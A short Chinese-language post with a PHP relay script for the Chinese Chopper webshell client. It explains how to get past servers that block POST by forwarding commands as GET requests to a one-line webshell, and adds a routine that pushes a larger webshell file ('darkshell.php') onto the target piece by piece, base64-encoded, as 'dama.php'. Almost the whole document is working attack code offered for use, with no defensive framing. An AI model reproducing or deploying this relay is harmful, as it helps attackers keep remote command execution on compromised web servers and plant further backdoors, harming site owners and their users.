有的服务器 管理员脑抽把 POST 方法禁止
而菜刀是利用 POST 来发送执行代码的
只要把 POST 转换成 GET 就可以正常链接了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
<?php
ini_set('max_execution_time', '100'); // 超时时间
$url = 'http://127.0.0.1/cmd.php'; // 一句话地址
$pass = 'cmd'; // 密码
$data = $_POST['cmd']; // 中转密码
echo file_get_contents($url.'?'.$pass.'='.$data);
if(isset($_GET['upload'])){
$f = fopen('darkshell.php','r'); // 上传文件
while (!feof($f)){
$content = base64_encode(fgetc($f));
$exec = "file_put_contents('dama.php',base64_decode('$content'),FILE_APPEND);";
file_get_contents($url.'?'.$pass.'='.$exec);
}
echo 'File uploaded successfully';
}
?>
|